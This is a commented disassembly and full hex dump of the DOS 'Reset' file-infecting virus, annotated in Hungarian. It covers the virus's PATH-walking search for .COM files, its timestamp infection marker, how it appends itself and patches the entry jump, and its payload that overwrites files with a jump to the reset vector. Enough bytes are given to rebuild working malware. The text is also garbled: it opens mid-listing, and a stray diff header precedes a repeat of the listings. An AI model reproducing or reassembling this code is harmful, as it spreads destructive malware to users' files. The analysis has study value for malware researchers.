114E:02F3 BA1F00 MOV DX,001F
114E:02F6 90 NOP
;DTA. visszaallitasa az eredeti cimre
114E:02F7 03D6 ADD DX,SI
114E:02F9 CD21 INT 21 ;file attr. beallitasa
114E:02FB 1E PUSH DS
114E:02FC B41A MOV AH,1A
114E:02FE 8B940000 MOV DX,[SI+0000]
114E:0302 8E9C0200 MOV DS,[SI+0002]
114E:0306 CD21 INT 21 ;DTA. megadasa
114E:0308 1F POP DS
;az eredeti program futtatasa
114E:0309 59 POP CX
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
114E:030C 33DB XOR BX,BX
114E:030E 33D2 XOR DX,DX
114E:0310 33F6 XOR SI,SI
114E:0312 BF0001 MOV DI,0100
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
;hogy a RET elo tudja
;venni es odaugrik
114E:0316 33FF XOR DI,DI
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
;re, ott mar az eredeti
;JMP 117 utasitas van,
;igy vegrehajtodik az
;eredeti prg.
;SP- hogy minek ?
114E:031B 800046 ADD BYTE PTR [BX+SI],46
114E:031E 0D2001 OR AX,0120
114E:0321 2100 AND [BX+SI],AX
114E:0323 2000 AND [BX+SI],AL
114E:0325 EB15 JMP 033C
114E:0327 90 NOP
114E:0328 E91F00 JMP 034A
114E:032B 2A2E434F SUB CH,[4F43]
114E:032F 4D DEC BP
114E:0330 0028 ADD [BX+SI],CH
114E:0332 004703 ADD [BX+03],AL
114E:0335 50 PUSH AX
114E:0336 41 INC CX
114E:0337 54 PUSH SP
114E:0338 48 DEC AX
114E:0339 3D5245 CMP AX,4552
114E:033C 53 PUSH BX
114E:033D 45 INC BP
114E:033E 54 PUSH SP
114E:033F 2E CS:
114E:0340 43 INC BX
114E:0341 4F DEC DI
114E:0342 4D DEC BP
114E:0343 0000 ADD [BX+SI],AL
114E:0345 0000 ADD [BX+SI],AL
114E:0347 4D DEC BP
114E:0348 004449 ADD [SI+49],AL
114E:034B 54 PUSH SP
114E:034C 2E CS:
114E:034D 43 INC BX
114E:034E 4F DEC DI
114E:034F 4D DEC BP
114E:0350 0000 ADD [BX+SI],AL
114E:0352 2020 AND [BX+SI],AH
114E:0354 2020 AND [BX+SI],AH
114E:0356 2020 AND [BX+SI],AH
114E:0358 2020 AND [BX+SI],AH
114E:035A 2020 AND [BX+SI],AH
114E:035C 2020 AND [BX+SI],AH
114E:035E 2020 AND [BX+SI],AH
114E:0360 2020 AND [BX+SI],AH
114E:0362 2020 AND [BX+SI],AH
114E:0364 2020 AND [BX+SI],AH
114E:0366 2020 AND [BX+SI],AH
114E:0368 2020 AND [BX+SI],AH
114E:036A 2020 AND [BX+SI],AH
114E:036C 2020 AND [BX+SI],AH
114E:036E 2020 AND [BX+SI],AH
114E:0370 2020 AND [BX+SI],AH
114E:0372 2020 AND [BX+SI],AH
114E:0374 2020 AND [BX+SI],AH
114E:0376 2020 AND [BX+SI],AH
114E:0378 2020 AND [BX+SI],AH
114E:037A 013F ADD [BX],DI
114E:037C 3F AAS
114E:037D 3F AAS
114E:037E 3F AAS
114E:037F 3F AAS
114E:0380 3F AAS
114E:0381 3F AAS
114E:0382 3F AAS
114E:0383 43 INC BX
114E:0384 4F DEC DI
114E:0385 4D DEC BP
114E:0386 0301 ADD AX,[BX+DI]
114E:0388 0000 ADD [BX+SI],AL
114E:038A 002E8B26 ADD [268B],CH
114E:038E 68 DB 68
114E:038F 2020 AND [BX+SI],AH
114E:0391 0121 ADD [BX+DI],SP
114E:0393 0022 ADD [BP+SI],AH
114E:0395 0000 ADD [BX+SI],AL
114E:0397 005245 ADD [BP+SI+45],DL
114E:039A 53 PUSH BX
114E:039B 45 INC BP
114E:039C 54 PUSH SP
114E:039D 2E CS:
114E:039E 43 INC BX
114E:039F 4F DEC DI
114E:03A0 4D DEC BP
114E:03A1 0000 ADD [BX+SI],AL
114E:03A3 4D DEC BP
114E:03A4 00EA ADD DL,CH
114E:03A6 F0 LOCK
114E:03A7 FF00 INC WORD PTR [BX+SI]
114E:03A9 F0 LOCK
114E:03AA 16 PUSH SS
114E:03AB 7C14 JL 03C1
Dump list:
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.


@ -0,0 +1,571 @@
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
(41) 21-033
Unassemble list:
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
114E:0103 49 DEC CX
114E:0104 60 DB 60
114E:0105 61 DB 61
114E:0106 6D DB 6D
114E:0107 206120 AND [BX+DI+20],AH
114E:010A 52 PUSH DX
114E:010B 65 DB 65
114E:010C 7365 JNB 0173
114E:010E 7420 JZ 0130
114E:0110 56 PUSH SI
114E:0111 49 DEC CX
114E:0112 52 PUSH DX
114E:0113 55 PUSH BP
114E:0114 53 PUSH BX
114E:0115 2124 AND [SI],SP
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
;program kezdete
114E:011A B409 MOV AH,09
114E:011C CD21 INT 21 ;uzenet kepernyore
114E:011E B400 MOV AH,00
114E:0120 CD20 INT 20 ;exit to DOS
114E:0122 51 PUSH CX ;stack-en marad
;a kovetkezo utasitas operandusat fertozeskor
;allitja be, igy mindig a helyes cimre mutat
114E:0123 BA1B03 MOV DX,031B
114E:0126 FC CLD ;elore
114E:0127 8BF2 MOV SI,DX
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
114E:012D BF0001 MOV DI,0100 ;program eleje
114E:0130 B90300 MOV CX,0003 ;3 byte
114E:0133 F3 REPZ
114E:0134 A4 MOVSB ;eredeti JMP 117
;visszamasolasa
114E:0135 8BF2 MOV SI,DX
114E:0137 B430 MOV AH,30
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
114E:013B 3C00 CMP AL,00
114E:013D 7503 JNZ 0142
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
;nem fertoz a virus s
;futtatja az eredeti
;programot
114E:0142 06 PUSH ES
114E:0143 B42F MOV AH,2F
114E:0145 CD21 INT 21 ;DTA. lekerdezese
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
114E:014F 07 POP ES
;DTA. beallitasa az ENTRY cimere /dir.-bol/
;ide masolja a find first a file adatait
114E:0150 BA5F00 MOV DX,005F ;DX=037a
114E:0153 90 NOP
114E:0154 03D6 ADD DX,SI
114E:0156 B41A MOV AH,1A
114E:0158 CD21 INT 21 ;DTA. letrehozasa
;037a-tol uj cimre
114E:015A 06 PUSH ES
114E:015B 56 PUSH SI
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
;kovetkezo dir.-ra mu-
;tatni
114E:0163 5E POP SI
114E:0164 56 PUSH SI
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
;stringet keresi a
;kornyezetbe PATH
114E:0169 AC LODSB ;AL=DS:[SI],SI++
114E:016A B90080 MOV CX,8000 ;32 kbyte
114E:016D F2 REPNZ
114E:016E AE SCASB ;megkeresi a kovetke-
;zo P betut
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
114E:0172 AC LODSB
114E:0173 AE SCASB ;betunkent hasonlitja
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
;karakter /kov.betu/
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
;osszehasonlitja a tobbi
;betut is
114E:0178 5E POP SI
114E:0179 07 POP ES ;ES:DI mutat az elso
;PATH-ra
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
;spec. cimenek mentese
;PATH mutato
114E:017E 8BFE MOV DI,SI ;SI=031b
114E:0180 81C71F00 ADD DI,001F ;DI=033a
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
;tat az adatokra
114E:0186 81C61F00 ADD SI,001F ;SI=033a
114E:018A 8BFE MOV DI,SI ;DI=033a
114E:018C EB3A JMP 01C8
;A kovetkezo PATH-ban megadott aldirectoryt
;File Path-ra masolja, igy a kovetkezo file-t
;ebben az aldirectoryban keresi
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
114E:0193 7503 JNZ 0198
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
114E:0198 1E PUSH DS
114E:0199 56 PUSH SI
114E:019A 26 ES:
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
114E:019F 8BFE MOV DI,SI ;DI=033a
114E:01A1 26 ES:
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
;masolasa ha az aktualis
;konyvtarban nem talalt
;fertozheto file-t
;a PATH= utanra mutat
;az SI
114E:01A6 81C71F00 ADD DI,001F
114E:01AA AC LODSB ;beolvas a kornyezetbol
;a 0029. byte-ot
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
114E:01AD 740A JZ 01B9 ;igen
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
;tobb
114E:01B1 7403 JZ 01B6 ;igen
114E:01B3 AA STOSB ;letarol 033a-tol
114E:01B4 EBF4 JMP 01AA
114E:01B6 BE0000 MOV SI,0000
114E:01B9 5B POP BX ;BX=regi SI BX mutat
;az adatokra
114E:01BA 1F POP DS
114E:01BB 89B71600 MOV [BX+0016],SI
;a kovetkezo PATH-ban adott dir. mar atmasolva
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
114E:01C3 7403 JZ 01C8 ;igen
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
;egy aldir. kiertekelese, eloszor az aktualis, majd
;a file path -ra masolt aldir. vegignezese, fertozes
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
;tat
;COM file keresese
114E:01C7 AA STOSB ;\ jel beirasa
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
;file nevet masolni,
;az aldir. neve utan
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
114E:01D2 B90600 MOV CX,0006
114E:01D5 F3 REPZ
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
;a PATH= szoveg utan
114E:01D7 8BF3 MOV SI,BX
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
;alltal foglalt teru-
;letre
114E:01DB BA1F00 MOV DX,001F
114E:01DE 90 NOP
114E:01DF 03D6 ADD DX,SI
114E:01E1 B90300 MOV CX,0003
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
;resese, az it. aktivi-
;zalasa utan felhozza a
;filemeretet, attrib.ot
;keletkezes datumat s
;idejet is!
114E:01E6 EB04 JMP 01EC ;vizsgalatra
114E:01E8 B44F MOV AH,4F
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
;zes keresese
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
;talal tobb COM file-t
;mas aldirt keres
;mar talalt COM file-t, az adataival az entry fel
;van toltve, a file ellenorzese es fertozese
;kovetkezik
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
;SI=0390
114E:01F4 241F AND AL,1F ;maszk 31 -el
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
;zott a file!
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
;file-t keresi
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
114E:0200 77E6 JA 01E8 ;ha > a file meret
;64000 byte-nal
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
;megvan a kivalasztott file
;a file nevet a filespec utan kell masolni
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
;PATH=*.COM
114E:020E 81C67D00 ADD SI,007D ;SI=0398
114E:0212 AC LODSB ;atmasolja a filenevet
;/megkeresett elso v.
;x.edik bejegyzest/
114E:0213 AA STOSB
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
;zaro nullaig masol
114E:0216 75FA JNZ 0212 ;nem
114E:0218 5E POP SI ;SI ujra az adatokra mu-
;tat
;a file egyes eredeti informacioinak megorzese
;hogy a fertozese ne tunjon fel
;minek a file ATTR. megegyszer lekerdezni?
114E:0219 B80043 MOV AX,4300
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
114E:021F 90 NOP
114E:0220 03D6 ADD DX,SI ;DX=031b
114E:0222 CD21 INT 21 ;attributum lekerdezese
;7.6.5.4.3.2.1.0.
;x x a d v s h r
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
114E:0228 B80143 MOV AX,4301
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
;ra valtoztatja
114E:022F BA1F00 MOV DX,001F
114E:0232 90 NOP
114E:0233 03D6 ADD DX,SI ;DX=033a
114E:0235 CD21 INT 21 ;attributum beallitasa
;file nyitasa
114E:0237 B8023D MOV AX,3D02
114E:023A BA1F00 MOV DX,001F
114E:023D 90 NOP
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
114E:0242 7303 JNB 0247
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
;fertozes
114E:0247 8BD8 MOV BX,AX ;handle
;a file idejenek lekerdezese de ez is megtalalhato az
;ENTRY teruleten
114E:0249 B80057 MOV AX,5700
114E:024C CD21 INT 21 ;file letrehozasi datum
;es ido bekerese
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
DH-sec DL-1/100
114E:0252 89940600 MOV [SI+0006],DX ;datum
114E:0256 B42C MOV AH,2C
114E:0258 CD21 INT 21 ;rendszerido bekerese
;annak eldontese hogy a filet tonkretegye-e
;ha a masodperc 7 akkor tonkreteszi /aktualis/
114E:025A 80E607 AND DH,07 ;sec = 7 ?
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
;file tonkretetele
114E:025F B440 MOV AH,40
114E:0261 B90500 MOV CX,0005
114E:0264 8BD6 MOV DX,SI ;reset
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
114E:026A CD21 INT 21 ;file elejere ir 5 byte
;-ot a RESET re ugrast!
114E:026C EB65 JMP 02D3
114E:026E 90 NOP
;fertozes
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
;lehessen
114E:026F B43F MOV AH,3F
114E:0271 B90300 MOV CX,0003
114E:0274 BA0A00 MOV DX,000A
114E:0277 90 NOP
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
114E:027A CD21 INT 21 ;a program eredeti elso
;3 byte-jat beolvassa
114E:027C 7255 JB 02D3 ;ha hiba van
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
114E:0281 7550 JNZ 02D3 ;nem
;file vegere allas az uj cimek kiszamitasa
114E:0283 B80242 MOV AX,4202
114E:0286 B90000 MOV CX,0000
114E:0289 BA0000 MOV DX,0000
114E:028C CD21 INT 21 ;file vegere pozicional
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
;nagyon lehet hiba!
;file elejere irando JMP operandus kiszamitasa
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
;utasitashoz amit a
;file elejere fog irni
;igy a JMP a file mos-
;tani vege utani bytera
;fog mutatni
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
;az uj file-on beluli adatterulet cimenek ki-
;szamitasa es beallitasa
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
;adatteruletre mutat
114E:029D 8BFE MOV DI,SI
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
;nak operandusanak
;cime
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
;cimet
;file moge masolja magat
;filemutato a file vegere mutat
114E:02A5 B440 MOV AH,40
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
;mutat
114E:02AC 81EAF901 SUB DX,01F9
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
;program a fertozendo
;program moge irja
114E:02B2 721F JB 02D3 ;hiba eseten
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
114E:02B7 751A JNZ 02D3 ;igen
;az elso 3 byte atallitasa, egy file
;vegere mutato ugro utasitasra
114E:02B9 B80042 MOV AX,4200
114E:02BC B90000 MOV CX,0000
114E:02BF BA0000 MOV DX,0000
114E:02C2 CD21 INT 21 ;file pointer a vegere
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
;het hiba!
114E:02C6 B440 MOV AH,40
114E:02C8 B90300 MOV CX,0003
114E:02CB 8BD6 MOV DX,SI
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
;mutat
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
;az eredeti ido -mar a fertozesjelzessel egyutt-
;visszaallitasa
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
;jelzi hogy mar ferto-
;zott egy file a SEC.
;-et 31-re allitja a
;file bejegyzesben
; hour | min. | sec.
;1111 1|111 111|0 0000
114E:02E3 B80157 MOV AX,5701
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
;file zarasa
114E:02E8 B43E MOV AH,3E
114E:02EA CD21 INT 21 ;file zarasa
;eredeti attributum visszaallitasa
114E:02EC B80143 MOV AX,4301
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
114E:02F3 BA1F00 MOV DX,001F
114E:02F6 90 NOP
;DTA. visszaallitasa az eredeti cimre
114E:02F7 03D6 ADD DX,SI
114E:02F9 CD21 INT 21 ;file attr. beallitasa
114E:02FB 1E PUSH DS
114E:02FC B41A MOV AH,1A
114E:02FE 8B940000 MOV DX,[SI+0000]
114E:0302 8E9C0200 MOV DS,[SI+0002]
114E:0306 CD21 INT 21 ;DTA. megadasa
114E:0308 1F POP DS
;az eredeti program futtatasa
114E:0309 59 POP CX
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
114E:030C 33DB XOR BX,BX
114E:030E 33D2 XOR DX,DX
114E:0310 33F6 XOR SI,SI
114E:0312 BF0001 MOV DI,0100
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
;hogy a RET elo tudja
;venni es odaugrik
114E:0316 33FF XOR DI,DI
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
;re, ott mar az eredeti
;JMP 117 utasitas van,
;igy vegrehajtodik az
;eredeti prg.
;SP- hogy minek ?
114E:031B 800046 ADD BYTE PTR [BX+SI],46
114E:031E 0D2001 OR AX,0120
114E:0321 2100 AND [BX+SI],AX
114E:0323 2000 AND [BX+SI],AL
114E:0325 EB15 JMP 033C
114E:0327 90 NOP
114E:0328 E91F00 JMP 034A
114E:032B 2A2E434F SUB CH,[4F43]
114E:032F 4D DEC BP
114E:0330 0028 ADD [BX+SI],CH
114E:0332 004703 ADD [BX+03],AL
114E:0335 50 PUSH AX
114E:0336 41 INC CX
114E:0337 54 PUSH SP
114E:0338 48 DEC AX
114E:0339 3D5245 CMP AX,4552
114E:033C 53 PUSH BX
114E:033D 45 INC BP
114E:033E 54 PUSH SP
114E:033F 2E CS:
114E:0340 43 INC BX
114E:0341 4F DEC DI
114E:0342 4D DEC BP
114E:0343 0000 ADD [BX+SI],AL
114E:0345 0000 ADD [BX+SI],AL
114E:0347 4D DEC BP
114E:0348 004449 ADD [SI+49],AL
114E:034B 54 PUSH SP
114E:034C 2E CS:
114E:034D 43 INC BX
114E:034E 4F DEC DI
114E:034F 4D DEC BP
114E:0350 0000 ADD [BX+SI],AL
114E:0352 2020 AND [BX+SI],AH
114E:0354 2020 AND [BX+SI],AH
114E:0356 2020 AND [BX+SI],AH
114E:0358 2020 AND [BX+SI],AH
114E:035A 2020 AND [BX+SI],AH
114E:035C 2020 AND [BX+SI],AH
114E:035E 2020 AND [BX+SI],AH
114E:0360 2020 AND [BX+SI],AH
114E:0362 2020 AND [BX+SI],AH
114E:0364 2020 AND [BX+SI],AH
114E:0366 2020 AND [BX+SI],AH
114E:0368 2020 AND [BX+SI],AH
114E:036A 2020 AND [BX+SI],AH
114E:036C 2020 AND [BX+SI],AH
114E:036E 2020 AND [BX+SI],AH
114E:0370 2020 AND [BX+SI],AH
114E:0372 2020 AND [BX+SI],AH
114E:0374 2020 AND [BX+SI],AH
114E:0376 2020 AND [BX+SI],AH
114E:0378 2020 AND [BX+SI],AH
114E:037A 013F ADD [BX],DI
114E:037C 3F AAS
114E:037D 3F AAS
114E:037E 3F AAS
114E:037F 3F AAS
114E:0380 3F AAS
114E:0381 3F AAS
114E:0382 3F AAS
114E:0383 43 INC BX
114E:0384 4F DEC DI
114E:0385 4D DEC BP
114E:0386 0301 ADD AX,[BX+DI]
114E:0388 0000 ADD [BX+SI],AL
114E:038A 002E8B26 ADD [268B],CH
114E:038E 68 DB 68
114E:038F 2020 AND [BX+SI],AH
114E:0391 0121 ADD [BX+DI],SP
114E:0393 0022 ADD [BP+SI],AH
114E:0395 0000 ADD [BX+SI],AL
114E:0397 005245 ADD [BP+SI+45],DL
114E:039A 53 PUSH BX
114E:039B 45 INC BP
114E:039C 54 PUSH SP
114E:039D 2E CS:
114E:039E 43 INC BX
114E:039F 4F DEC DI
114E:03A0 4D DEC BP
114E:03A1 0000 ADD [BX+SI],AL
114E:03A3 4D DEC BP
114E:03A4 00EA ADD DL,CH
114E:03A6 F0 LOCK
114E:03A7 FF00 INC WORD PTR [BX+SI]
114E:03A9 F0 LOCK
114E:03AA 16 PUSH SS
114E:03AB 7C14 JL 03C1
Dump list:
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
